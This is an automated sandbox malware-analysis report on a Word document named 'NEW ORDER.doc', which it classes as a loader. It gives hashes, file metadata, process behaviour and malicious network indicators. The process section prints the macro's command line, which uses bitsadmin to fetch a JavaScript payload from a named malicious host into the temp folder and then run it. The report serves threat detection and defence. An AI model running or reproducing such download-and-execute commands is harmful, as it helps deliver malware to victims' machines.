analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

NEW ORDER.doc

Full analysis: https://app.any.run/tasks/fda98227-1f0e-4a5b-841c-cd36da11237d
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: January 10, 2019, 16:18:18
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
loader
Indicators:
MIME: text/xml
File info: XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
MD5:

B62934A90F6B6AB6A84DDB9478562D1F

SHA1:

A1DF15C01C93D9E6D711ACEC1670A0976BD390D8

SHA256:

584D0949DD689D3D4C825B499D1A093FC9FE274CB8D04B52116B90F994A5753F

SSDEEP:

3072:E92vUDrEWmbmvDuBUKTrXraCtHlpORaAs/vUEMVXpKxL:EJfBSBUKTrOwl0hsXUEM9o

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Uses BITADMIN.EXE for downloading application

      • cmd.exe (PID: 4092)
    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 2860)
    • Starts CMD.EXE for commands execution

      • WINWORD.EXE (PID: 2860)
  • SUSPICIOUS

    No suspicious indicators.
  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2860)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 2860)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.xml | Microsoft Office XML Flat File Format Word Document (ASCII) (43.7)
.rels | Open Office XML Relationships (28.2)
.xml | Microsoft Office XML Flat File Format (ASCII) (20.8)
.svg | Scalable Vector Graphics (var.3) (4.5)
.xml | Generic XML (ASCII) (1.5)

EXIF

XMP

PackagePartXmlDataWebSettingsAllowPNG: -
PackagePartXmlDataWebSettingsOptimizeForBrowser: -
PackagePartXmlDataWebSettingsIgnorable: w14 w15
PackagePartXmlDataFontsFontSigCsb1: 00000000
PackagePartXmlDataFontsFontSigCsb0: 000001FF
PackagePartXmlDataFontsFontSigUsb3: 00000000
PackagePartXmlDataFontsFontSigUsb2: 00000009
PackagePartXmlDataFontsFontSigUsb1: C000247B
PackagePartXmlDataFontsFontSigUsb0: E0002AFF
PackagePartXmlDataFontsFontPitchVal: variable
PackagePartXmlDataFontsFontFamilyVal: swiss
PackagePartXmlDataFontsFontCharsetVal: 00
PackagePartXmlDataFontsFontPanose1Val: 020F0502020204030204
PackagePartXmlDataFontsFontName: Calibri
PackagePartXmlDataFontsIgnorable: w14 w15
PackagePartXmlDataCorePropertiesModified: 2018:02:19 14:41:00Z
PackagePartXmlDataCorePropertiesModifiedType: dcterms:W3CDTF
PackagePartXmlDataCorePropertiesCreated: 2018:02:19 14:41:00Z
PackagePartXmlDataCorePropertiesCreatedType: dcterms:W3CDTF
PackagePartXmlDataCorePropertiesRevision: 1
PackagePartXmlDataCorePropertiesLastModifiedBy: omoba
PackagePartXmlDataCorePropertiesDescription: -
PackagePartXmlDataCorePropertiesKeywords: -
PackagePartXmlDataCorePropertiesCreator: omoba
PackagePartXmlDataCorePropertiesSubject: -
PackagePartXmlDataCorePropertiesTitle: -
PackagePartXmlDataStylesStyleTblPrTblCellMarRightType: dxa
PackagePartXmlDataStylesStyleTblPrTblCellMarRightW: 108
PackagePartXmlDataStylesStyleTblPrTblCellMarBottomType: dxa
PackagePartXmlDataStylesStyleTblPrTblCellMarBottomW: -
PackagePartXmlDataStylesStyleTblPrTblCellMarLeftType: dxa
PackagePartXmlDataStylesStyleTblPrTblCellMarLeftW: 108
PackagePartXmlDataStylesStyleTblPrTblCellMarTopType: dxa
PackagePartXmlDataStylesStyleTblPrTblCellMarTopW: -
PackagePartXmlDataStylesStyleTblPrTblIndType: dxa
PackagePartXmlDataStylesStyleTblPrTblIndW: -
PackagePartXmlDataStylesStyleUnhideWhenUsed: -
PackagePartXmlDataStylesStyleSemiHidden: -
PackagePartXmlDataStylesStyleUiPriorityVal: 1
PackagePartXmlDataStylesStyleQFormat: -
PackagePartXmlDataStylesStyleNameVal: Normal
PackagePartXmlDataStylesStyleStyleId: Normal
PackagePartXmlDataStylesStyleDefault: 1
PackagePartXmlDataStylesStyleType: paragraph
PackagePartXmlDataStylesLatentStylesLsdExceptionUnhideWhenUsed: 1
PackagePartXmlDataStylesLatentStylesLsdExceptionSemiHidden: 1
PackagePartXmlDataStylesLatentStylesLsdExceptionQFormat: 1
PackagePartXmlDataStylesLatentStylesLsdExceptionUiPriority: -
PackagePartXmlDataStylesLatentStylesLsdExceptionName: Normal
PackagePartXmlDataStylesLatentStylesCount: 371
PackagePartXmlDataStylesLatentStylesDefQFormat: -
PackagePartXmlDataStylesLatentStylesDefUnhideWhenUsed: -
PackagePartXmlDataStylesLatentStylesDefSemiHidden: -
PackagePartXmlDataStylesLatentStylesDefUIPriority: 99
PackagePartXmlDataStylesLatentStylesDefLockedState: -
PackagePartXmlDataStylesDocDefaultsPPrDefaultPPrSpacingLineRule: auto
PackagePartXmlDataStylesDocDefaultsPPrDefaultPPrSpacingLine: 259
PackagePartXmlDataStylesDocDefaultsPPrDefaultPPrSpacingAfter: 160
PackagePartXmlDataStylesDocDefaultsRPrDefaultRPrLangBidi: ar-SA
PackagePartXmlDataStylesDocDefaultsRPrDefaultRPrLangEastAsia: en-US
PackagePartXmlDataStylesDocDefaultsRPrDefaultRPrLangVal: en-US
PackagePartXmlDataStylesDocDefaultsRPrDefaultRPrSzCsVal: 22
PackagePartXmlDataStylesDocDefaultsRPrDefaultRPrSzVal: 22
PackagePartXmlDataStylesDocDefaultsRPrDefaultRPrRFontsCstheme: minorBidi
PackagePartXmlDataStylesDocDefaultsRPrDefaultRPrRFontsHAnsiTheme: minorHAnsi
PackagePartXmlDataStylesDocDefaultsRPrDefaultRPrRFontsEastAsiaTheme: minorHAnsi
PackagePartXmlDataStylesDocDefaultsRPrDefaultRPrRFontsAsciiTheme: minorHAnsi
PackagePartXmlDataStylesIgnorable: w14 w15
PackagePartXmlDataPropertiesAppVersion: 15
PackagePartXmlDataPropertiesHyperlinksChanged: -
PackagePartXmlDataPropertiesSharedDoc: -
PackagePartXmlDataPropertiesCharactersWithSpaces: 1
PackagePartXmlDataPropertiesLinksUpToDate: -
PackagePartXmlDataPropertiesCompany: -
PackagePartXmlDataPropertiesScaleCrop: -
PackagePartXmlDataPropertiesParagraphs: 1
PackagePartXmlDataPropertiesLines: 1
PackagePartXmlDataPropertiesDocSecurity: -
PackagePartXmlDataPropertiesApplication: Microsoft Office Word
PackagePartXmlDataPropertiesCharacters: 1
PackagePartXmlDataPropertiesWords: -
PackagePartXmlDataPropertiesPages: 1
PackagePartXmlDataPropertiesTotalTime: -
PackagePartXmlDataPropertiesTemplate: Normal.dotm
PackagePartXmlDataPropertiesXmlns: http://schemas.openxmlformats.org/officeDocument/2006/extended-properties
PackagePartXmlDataSettingsDocIdVal: {6B02E763-C495-42BF-82DE-678220608874}
PackagePartXmlDataSettingsChartTrackingRefBased: -
PackagePartXmlDataSettingsListSeparatorVal: ,
PackagePartXmlDataSettingsDecimalSymbolVal: .
PackagePartXmlDataSettingsShapeDefaultsShapelayoutIdmapData: 1
PackagePartXmlDataSettingsShapeDefaultsShapelayoutIdmapExt: edit
PackagePartXmlDataSettingsShapeDefaultsShapelayoutExt: edit
PackagePartXmlDataSettingsShapeDefaultsShapedefaultsSpidmax: 1026
PackagePartXmlDataSettingsShapeDefaultsShapedefaultsExt: edit
PackagePartXmlDataSettingsClrSchemeMappingFollowedHyperlink: followedHyperlink
PackagePartXmlDataSettingsClrSchemeMappingHyperlink: hyperlink
PackagePartXmlDataSettingsClrSchemeMappingAccent6: accent6
PackagePartXmlDataSettingsClrSchemeMappingAccent5: accent5
PackagePartXmlDataSettingsClrSchemeMappingAccent4: accent4
PackagePartXmlDataSettingsClrSchemeMappingAccent3: accent3
PackagePartXmlDataSettingsClrSchemeMappingAccent2: accent2
PackagePartXmlDataSettingsClrSchemeMappingAccent1: accent1
PackagePartXmlDataSettingsClrSchemeMappingT2: dark2
PackagePartXmlDataSettingsClrSchemeMappingBg2: light2
PackagePartXmlDataSettingsClrSchemeMappingT1: dark1
PackagePartXmlDataSettingsClrSchemeMappingBg1: light1
PackagePartXmlDataSettingsThemeFontLangVal: en-US
PackagePartXmlDataSettingsMathPrNaryLimVal: undOvr
PackagePartXmlDataSettingsMathPrIntLimVal: subSup
PackagePartXmlDataSettingsMathPrWrapIndentVal: 1440
PackagePartXmlDataSettingsMathPrDefJcVal: centerGroup
PackagePartXmlDataSettingsMathPrRMarginVal: -
PackagePartXmlDataSettingsMathPrLMarginVal: -
PackagePartXmlDataSettingsMathPrDispDef: -
PackagePartXmlDataSettingsMathPrSmallFracVal: -
PackagePartXmlDataSettingsMathPrBrkBinSubVal: --
PackagePartXmlDataSettingsMathPrBrkBinVal: before
PackagePartXmlDataSettingsMathPrMathFontVal: Cambria Math
PackagePartXmlDataSettingsRsidsRsidVal: 001F716E
PackagePartXmlDataSettingsRsidsRsidRootVal: 003B3DF3
PackagePartXmlDataSettingsCompatCompatSettingVal: 15
PackagePartXmlDataSettingsCompatCompatSettingUri: http://schemas.microsoft.com/office/word
PackagePartXmlDataSettingsCompatCompatSettingName: compatibilityMode
PackagePartXmlDataSettingsCharacterSpacingControlVal: doNotCompress
PackagePartXmlDataSettingsDefaultTabStopVal: 720
PackagePartXmlDataSettingsZoomPercent: 100
PackagePartXmlDataSettingsIgnorable: w14 w15
PackagePartXmlDataVbaSuppDataMcdsMcdCmg: 56
PackagePartXmlDataVbaSuppDataMcdsMcdBEncrypt: 00
PackagePartXmlDataVbaSuppDataMcdsMcdName: Project.UffzDaYWduvDCXK.FLdDVPAkcwcFUogUYhQP
PackagePartXmlDataVbaSuppDataMcdsMcdMacroName: PROJECT.UFFZDAYWDUVDCXK.FLDDVPAKCWCFUOGUYHQP
PackagePartXmlDataVbaSuppDataDocEventsEventDocOpen: -
PackagePartXmlDataVbaSuppDataIgnorable: w14 w15 wp14
PackagePartXmlDataThemeExtLstExtThemeFamilyVid: {4A3C46E8-61CC-4603-A589-7422A47A8E4A}
PackagePartXmlDataThemeExtLstExtThemeFamilyId: {62F939B6-93AF-4DB8-9C6B-D6C7DFDC589F}
PackagePartXmlDataThemeExtLstExtThemeFamilyName: Office Theme
PackagePartXmlDataThemeExtLstExtUri: {05A4C25C-085E-4340-85A3-A5531E510DB2}
PackagePartXmlDataThemeExtraClrSchemeLst: -
PackagePartXmlDataThemeObjectDefaults: -
PackagePartXmlDataThemeThemeElementsFmtSchemeBgFillStyleLstGradFillLinScaled: -
PackagePartXmlDataThemeThemeElementsFmtSchemeBgFillStyleLstGradFillLinAng: 5400000
PackagePartXmlDataThemeThemeElementsFmtSchemeBgFillStyleLstGradFillGsLstGsSchemeClrLumModVal: 102000
PackagePartXmlDataThemeThemeElementsFmtSchemeBgFillStyleLstGradFillGsLstGsSchemeClrShadeVal: 98000
PackagePartXmlDataThemeThemeElementsFmtSchemeBgFillStyleLstGradFillGsLstGsSchemeClrSatModVal: 150000
PackagePartXmlDataThemeThemeElementsFmtSchemeBgFillStyleLstGradFillGsLstGsSchemeClrTintVal: 93000
PackagePartXmlDataThemeThemeElementsFmtSchemeBgFillStyleLstGradFillGsLstGsSchemeClrVal: phClr
PackagePartXmlDataThemeThemeElementsFmtSchemeBgFillStyleLstGradFillGsLstGsPos: -
PackagePartXmlDataThemeThemeElementsFmtSchemeBgFillStyleLstGradFillRotWithShape: 1
PackagePartXmlDataThemeThemeElementsFmtSchemeBgFillStyleLstSolidFillSchemeClrSatModVal: 170000
PackagePartXmlDataThemeThemeElementsFmtSchemeBgFillStyleLstSolidFillSchemeClrTintVal: 95000
PackagePartXmlDataThemeThemeElementsFmtSchemeBgFillStyleLstSolidFillSchemeClrVal: phClr
PackagePartXmlDataThemeThemeElementsFmtSchemeEffectStyleLstEffectStyleEffectLstOuterShdwSrgbClrAlphaVal: 63000
PackagePartXmlDataThemeThemeElementsFmtSchemeEffectStyleLstEffectStyleEffectLstOuterShdwSrgbClrVal: 000000
PackagePartXmlDataThemeThemeElementsFmtSchemeEffectStyleLstEffectStyleEffectLstOuterShdwRotWithShape: -
PackagePartXmlDataThemeThemeElementsFmtSchemeEffectStyleLstEffectStyleEffectLstOuterShdwAlgn: ctr
PackagePartXmlDataThemeThemeElementsFmtSchemeEffectStyleLstEffectStyleEffectLstOuterShdwDir: 5400000
PackagePartXmlDataThemeThemeElementsFmtSchemeEffectStyleLstEffectStyleEffectLstOuterShdwDist: 19050
PackagePartXmlDataThemeThemeElementsFmtSchemeEffectStyleLstEffectStyleEffectLstOuterShdwBlurRad: 57150
PackagePartXmlDataThemeThemeElementsFmtSchemeEffectStyleLstEffectStyleEffectLst: -
PackagePartXmlDataThemeThemeElementsFmtSchemeLnStyleLstLnMiterLim: 800000
PackagePartXmlDataThemeThemeElementsFmtSchemeLnStyleLstLnPrstDashVal: solid
PackagePartXmlDataThemeThemeElementsFmtSchemeLnStyleLstLnSolidFillSchemeClrVal: phClr
PackagePartXmlDataThemeThemeElementsFmtSchemeLnStyleLstLnAlgn: ctr
PackagePartXmlDataThemeThemeElementsFmtSchemeLnStyleLstLnCmpd: sng
PackagePartXmlDataThemeThemeElementsFmtSchemeLnStyleLstLnCap: flat
PackagePartXmlDataThemeThemeElementsFmtSchemeLnStyleLstLnW: 6350
PackagePartXmlDataThemeThemeElementsFmtSchemeFillStyleLstGradFillGsLstGsSchemeClrShadeVal: 100000
PackagePartXmlDataThemeThemeElementsFmtSchemeFillStyleLstGradFillLinScaled: -
PackagePartXmlDataThemeThemeElementsFmtSchemeFillStyleLstGradFillLinAng: 5400000
PackagePartXmlDataThemeThemeElementsFmtSchemeFillStyleLstGradFillGsLstGsSchemeClrTintVal: 67000
PackagePartXmlDataThemeThemeElementsFmtSchemeFillStyleLstGradFillGsLstGsSchemeClrSatModVal: 105000
PackagePartXmlDataThemeThemeElementsFmtSchemeFillStyleLstGradFillGsLstGsSchemeClrLumModVal: 110000
PackagePartXmlDataThemeThemeElementsFmtSchemeFillStyleLstGradFillGsLstGsSchemeClrVal: phClr
PackagePartXmlDataThemeThemeElementsFmtSchemeFillStyleLstGradFillGsLstGsPos: -
PackagePartXmlDataThemeThemeElementsFmtSchemeFillStyleLstGradFillRotWithShape: 1
PackagePartXmlDataThemeThemeElementsFmtSchemeFillStyleLstSolidFillSchemeClrVal: phClr
PackagePartXmlDataThemeThemeElementsFmtSchemeName: Office
PackagePartXmlDataThemeThemeElementsFontSchemeMinorFontFontTypeface: MS 明朝
PackagePartXmlDataThemeThemeElementsFontSchemeMinorFontFontScript: Jpan
PackagePartXmlDataThemeThemeElementsFontSchemeMinorFontCsTypeface: -
PackagePartXmlDataThemeThemeElementsFontSchemeMinorFontEaTypeface: -
PackagePartXmlDataThemeThemeElementsFontSchemeMinorFontLatinPanose: 020F0502020204030204
PackagePartXmlDataThemeThemeElementsFontSchemeMinorFontLatinTypeface: Calibri
PackagePartXmlDataThemeThemeElementsFontSchemeMajorFontFontTypeface: MS ゴシック
PackagePartXmlDataThemeThemeElementsFontSchemeMajorFontFontScript: Jpan
PackagePartXmlDataThemeThemeElementsFontSchemeMajorFontCsTypeface: -
PackagePartXmlDataThemeThemeElementsFontSchemeMajorFontEaTypeface: -
PackagePartXmlDataThemeThemeElementsFontSchemeMajorFontLatinPanose: 020F0302020204030204
PackagePartXmlDataThemeThemeElementsFontSchemeMajorFontLatinTypeface: Calibri Light
PackagePartXmlDataThemeThemeElementsFontSchemeName: Office
PackagePartXmlDataThemeThemeElementsClrSchemeFolHlinkSrgbClrVal: 954F72
PackagePartXmlDataThemeThemeElementsClrSchemeHlinkSrgbClrVal: 0563C1
PackagePartXmlDataThemeThemeElementsClrSchemeAccent6SrgbClrVal: 70AD47
PackagePartXmlDataThemeThemeElementsClrSchemeAccent5SrgbClrVal: 4472C4
PackagePartXmlDataThemeThemeElementsClrSchemeAccent4SrgbClrVal: FFC000
PackagePartXmlDataThemeThemeElementsClrSchemeAccent3SrgbClrVal: A5A5A5
PackagePartXmlDataThemeThemeElementsClrSchemeAccent2SrgbClrVal: ED7D31
PackagePartXmlDataThemeThemeElementsClrSchemeAccent1SrgbClrVal: 5B9BD5
PackagePartXmlDataThemeThemeElementsClrSchemeLt2SrgbClrVal: E7E6E6
PackagePartXmlDataThemeThemeElementsClrSchemeDk2SrgbClrVal: 44546A
PackagePartXmlDataThemeThemeElementsClrSchemeLt1SysClrLastClr: FFFFFF
PackagePartXmlDataThemeThemeElementsClrSchemeLt1SysClrVal: window
PackagePartXmlDataThemeThemeElementsClrSchemeDk1SysClrLastClr: 000000
PackagePartXmlDataThemeThemeElementsClrSchemeDk1SysClrVal: windowText
PackagePartXmlDataThemeThemeElementsClrSchemeName: Office
PackagePartXmlDataThemeName: Office Theme
PackagePartCompression: store
PackagePartBinaryData: (Binary data 49746 bytes, use -b option to extract)
PackagePartXmlDataDocumentBodySectPrDocGridLinePitch: 360
PackagePartXmlDataDocumentBodySectPrColsSpace: 720
PackagePartXmlDataDocumentBodySectPrPgMarGutter: -
PackagePartXmlDataDocumentBodySectPrPgMarFooter: 720
PackagePartXmlDataDocumentBodySectPrPgMarHeader: 720
PackagePartXmlDataDocumentBodySectPrPgMarLeft: 1440
PackagePartXmlDataDocumentBodySectPrPgMarBottom: 1440
PackagePartXmlDataDocumentBodySectPrPgMarRight: 1440
PackagePartXmlDataDocumentBodySectPrPgMarTop: 1440
PackagePartXmlDataDocumentBodySectPrPgSzH: 15840
PackagePartXmlDataDocumentBodySectPrPgSzW: 12240
PackagePartXmlDataDocumentBodySectPrRsidR: 001F716E
PackagePartXmlDataDocumentBodyPRDrawingInlineGraphicGraphicDataPicSpPrPrstGeomAvLst: -
PackagePartXmlDataDocumentBodyPRDrawingInlineGraphicGraphicDataPicSpPrPrstGeomPrst: rect
PackagePartXmlDataDocumentBodyPRDrawingInlineGraphicGraphicDataPicSpPrXfrmExtCy: 4649492
PackagePartXmlDataDocumentBodyPRDrawingInlineGraphicGraphicDataPicSpPrXfrmExtCx: 4649492
PackagePartXmlDataDocumentBodyPRDrawingInlineGraphicGraphicDataPicSpPrXfrmOffY: -
PackagePartXmlDataDocumentBodyPRDrawingInlineGraphicGraphicDataPicSpPrXfrmOffX: -
PackagePartXmlDataDocumentBodyPRDrawingInlineGraphicGraphicDataPicBlipFillStretchFillRect: -
PackagePartXmlDataDocumentBodyPRDrawingInlineGraphicGraphicDataPicBlipFillBlipExtLstExtUseLocalDpiVal: -
PackagePartXmlDataDocumentBodyPRDrawingInlineGraphicGraphicDataPicBlipFillBlipExtLstExtUri: {28A0092B-C50C-407E-A947-70E740481C1C}
PackagePartXmlDataDocumentBodyPRDrawingInlineGraphicGraphicDataPicBlipFillBlipEmbed: rId5
PackagePartXmlDataDocumentBodyPRDrawingInlineGraphicGraphicDataPicNvPicPrCNvPicPr: -
PackagePartXmlDataDocumentBodyPRDrawingInlineGraphicGraphicDataPicNvPicPrCNvPrName: -
PackagePartXmlDataDocumentBodyPRDrawingInlineGraphicGraphicDataPicNvPicPrCNvPrId: 1
PackagePartXmlDataDocumentBodyPRDrawingInlineGraphicGraphicDataUri: http://schemas.openxmlformats.org/drawingml/2006/picture
PackagePartXmlDataDocumentBodyPRDrawingInlineCNvGraphicFramePr: -
PackagePartXmlDataDocumentBodyPRDrawingInlineDocPrName: Picture 1
PackagePartXmlDataDocumentBodyPRDrawingInlineDocPrId: 1
PackagePartXmlDataDocumentBodyPRDrawingInlineEffectExtentB: -
PackagePartXmlDataDocumentBodyPRDrawingInlineEffectExtentR: -
PackagePartXmlDataDocumentBodyPRDrawingInlineEffectExtentT: -
PackagePartXmlDataDocumentBodyPRDrawingInlineEffectExtentL: -
PackagePartXmlDataDocumentBodyPRDrawingInlineExtentCy: 4649492
PackagePartXmlDataDocumentBodyPRDrawingInlineExtentCx: 4649492
PackagePartXmlDataDocumentBodyPRDrawingInlineDistR: -
PackagePartXmlDataDocumentBodyPRDrawingInlineDistL: -
PackagePartXmlDataDocumentBodyPRDrawingInlineDistB: -
PackagePartXmlDataDocumentBodyPRDrawingInlineDistT: -
PackagePartXmlDataDocumentBodyPRRPrNoProof: -
PackagePartXmlDataDocumentBodyPBookmarkEndId: -
PackagePartXmlDataDocumentBodyPBookmarkStartName: _GoBack
PackagePartXmlDataDocumentBodyPBookmarkStartId: -
PackagePartXmlDataDocumentBodyPRsidRDefault: 003B3DF3
PackagePartXmlDataDocumentBodyPRsidR: 001F716E
PackagePartXmlDataDocumentIgnorable: w14 w15 wp14
PackagePartXmlDataRelationshipsRelationshipTarget: docProps/app.xml
PackagePartXmlDataRelationshipsRelationshipType: http://schemas.openxmlformats.org/officeDocument/2006/relationships/extended-properties
PackagePartXmlDataRelationshipsRelationshipId: rId3
PackagePartXmlDataRelationshipsXmlns: http://schemas.openxmlformats.org/package/2006/relationships
PackagePartPadding: 512
PackagePartContentType: application/vnd.openxmlformats-package.relationships+xml
PackagePartName: /_rels/.rels
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
34
Monitored processes
3
Malicious processes
1
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winword.exe no specs cmd.exe no specs bitsadmin.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2860"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\NEW ORDER.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
4092cmd.exe /C CD C: & bitsadmin /transfer CXyvYqZGwvAFrGLHa /priority foreground http://rossichspb.ru/c/tt.js %TEMP%\Name.js && start %TEMP%\Name.jsC:\Windows\system32\cmd.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
2149122452
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2660bitsadmin /transfer CXyvYqZGwvAFrGLHa /priority foreground http://rossichspb.ru/c/tt.js C:\Users\admin\AppData\Local\Temp\Name.js C:\Windows\system32\bitsadmin.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
BITS administration utility
Exit code:
2149122452
Version:
7.5.7600.16385 (win7_rtm.090713-1255)
Total events
1 322
Read events
716
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
0
Text files
0
Unknown types
2

Dropped files

PID
Process
Filename
Type
2860WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR8A83.tmp.cvr
MD5:
SHA256:
2860WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:B63E0CADFFAD2BE15CACE5098449DE7D
SHA256:0C4292C028F0E13DB0AC7C146510D071B680F092A5576337DB213B97E3A17A6A
2860WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$W ORDER.docpgc
MD5:A194DD85FBB3B517F87047A20E6BD8D3
SHA256:D8EFDC04306B77DB1FF8ABA960490AE552934B6759DD84145F05B91F779A7729
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
1
TCP/UDP connections
1
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
HEAD
404
87.236.16.54:80
http://rossichspb.ru/c/tt.js
RU
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
87.236.16.54:80
rossichspb.ru
Beget Ltd
RU
malicious

DNS requests

Domain
IP
Reputation
rossichspb.ru
  • 87.236.16.54
malicious

Threats

No threats detected
No debug info